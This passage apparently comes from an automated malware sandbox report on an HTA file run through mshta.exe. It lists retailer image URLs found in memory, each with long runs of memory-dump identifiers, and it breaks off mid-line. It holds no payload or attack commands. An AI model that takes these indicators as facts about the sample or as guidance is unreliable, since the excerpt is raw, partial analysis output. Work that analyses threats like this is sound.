00000000.00000003.25443915061.000000000951D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410037652.00000000094AB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.000000000944F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-desk-1250x313px-Natal-f25ef34312d3.
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384418209.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432084842.0000000009C17000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-mobile-648x324px-Natal-0044175eebbb
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444806712.000000000A9C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460523486.000000000A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483283460.0000000006F2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png
Source: mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484951411.0000000009561000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png3f6b.we
Source: mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-mobile-648x54-2362be2b92fb.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.0000000006799000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.0000000006799000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25321151203.0000000006799000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.0000000006799000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngR
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngm
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.pngF
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.pnge
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.pngt
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459044559.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477923652.0000000006ED2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410412246.0000000006ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pngY
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444129212.00000000094F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pngz
Source: mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463690570.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465160079.0000000006F2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483283460.0000000006F2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484604910.00000000094BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.png
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484648425.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444617125.00000000094C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.pnge-desk-
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.pngl
Source: mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395346989.00000000094B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410456399.00000000094BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484604910.00000000094BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_desk-e41609a1df26.pngy
Source: mshta.exe, 00000000.00000003.25465970538.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463049047.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466101017.0000000003074000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25479770165.0000000003075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400515549.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25384835381.0000000003018000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317721237.000000000678A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/6-home-destaque_mob-26a210faf78c.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459044559.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478844378.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.png?
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/7-home-destaque_desk-7bf2f2fa995c.pngs
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 